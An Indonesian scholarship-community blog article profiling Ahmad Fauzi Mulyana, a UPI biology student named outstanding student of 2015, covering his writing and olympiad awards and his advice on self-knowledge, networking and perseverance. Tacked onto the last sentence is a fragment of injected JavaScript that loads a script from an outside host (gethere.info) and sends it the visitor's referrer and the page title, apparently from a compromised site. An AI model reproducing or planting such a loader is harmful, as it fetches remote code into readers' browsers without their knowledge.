“Ini Dia Rahasia Berprestasi ala Ahmad Fauzi” (Peraih Anugrah Mahasiswa Berprestasi UPI 2015)

 

Hallo sahabat semua, mau kenal sama sosok inspiratif dari Sahabat Beasiswa? Ahmad Fauzi Mulyana seorang mahasiswa UPI angkatan 2011 jurusan Biologi ini berhasil meraih anugrah mahasiswa berprestasi UPI 2015. Ahmad juga sekarang menjadi koordinator sahabat beasiswa chapter bandung loh. Selain itu, Ahmad juga mengantongi sederet prestasi yang  patut kita tiru dari beliau. Sahabat pasti penasaran kan? Yuk simak serangkaian pengalaman beliau dalam  meraih  prestasi. Pretasi apa saja yang sudah ditorehkan sehingga di anugrahi sebagai mahasiswa berprestasi UPI 2015? Alhamdulillah, selama pengalaman saya sebagai mahasiswa saya pernah mendapatkan berbagai penghargaan menjadi finalis, ataupun mendapatkan juara I, II nasinonal di bidang menulis, seperti karya tulis Al-Qur’an, Karya Tulis Ilmiah, Essay maupun artikel di tingkat Nasional. Diawal tahun 2015 saya juga tergabung bersama penulis-penulis muda seluruh Indonesia dalam penulisan buku kisah 25 ilmuwan Indonesia yang mendunia oleh Ikatan Ilmuwan Indonesia Internasional (I-4). Selain itu, di tahun 2014 dan tahun 2015 ini, saya dinobatkan sebagai Mahasiswa Berprestasi (Mawapres) Biologi FPMIPA UPI dan selalu menjadi perwakilan Tim Olimpiade Biologi UPI dalam ajang ON-MIPA, OSN-PTI dari tahun 2012 hingga sekarang.

Gimana sih caranya biar jadi mahasiswa berprestasi? Untuk menjadi seorang  mahasiswa berprestasi kita harus mengerti apa itu mahasiswa berprestasi? Menerapkan sistem ATM (Amati, Tiru, dan Modifikasi) dari mahasiswa berprestasi sebelumnya dan belajar kepada orang-orang yang kompeten dalam bidangnya, Misalnya kompetensi sorang mahasiswa berprestasi (Contoh Juara karya tulis, dll) kemudian PDKT sama dosen penguji mawapres untuk memotivasi sekaligus meminta tips-tips dari beliau. Lalu gimana cara kita mengembangkan diri agar menjadi sosok yang berprestasi? Usahakan sedini mungkin kita mengenal diri kita, Gampang nya sih coba jawab Who am I? sebanyak apa kita bisa menjawab ? Ketertarikan  kita? Potensi kita? Hal- hal postif dari diri kita ? dan kekurangan yang masih dioptimalkan dari diri kita? Selain itu coba memperbanyak relasi dengan orang-orang yang memiliki segudang pengalaman, ikuti juga organisasi dan volunteer yang bisa improve kapasistas dan potensi kita. Beliau  juga selalu ingin melihat kebahagiaan dan senyuman orang tua dan terlebih untuk khalayak serta masyarakat luas, agar bisa memotivasi yang lain, bisa menginspirasi karena dengan prestasi dapat memeberikan banyak manfaat bagi orang lain. Adakah pesan buat teman –teman sahabat beasiswa? Ada dua kuburan terbanyak di dunia ini, yang pertama adalah kuburan orang-orang yang  telah  meninggal dunia, yang kedua adalah kuburan orang-orang yang mengubur mimpinya. Maka bangunlah  segera dan  wujudkan  setiap  mimpi mu  menjadi nyata dengan usaha,kerja keras, pantang menyerah, serta do’a. Karena “Masa depan adalah  milik Mereka yang menyiapkannya hari ini dan selalu memperjuangkannya”. Wah luar biasa sekali pesan dari beliau dan serangkaian prestasi yang mengisnpirasi  kita , buat sahabat semua jangan pernah  takut dalam  meraih mimpi  kuatkan lah tekad agar semua yang kita cita-citakan dapat tercapai.

Simak terus artikel PSDM sahabat beasiswa , semoga kisah nya mengisnpirasi banyak orang. Salam Prestatif !!!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;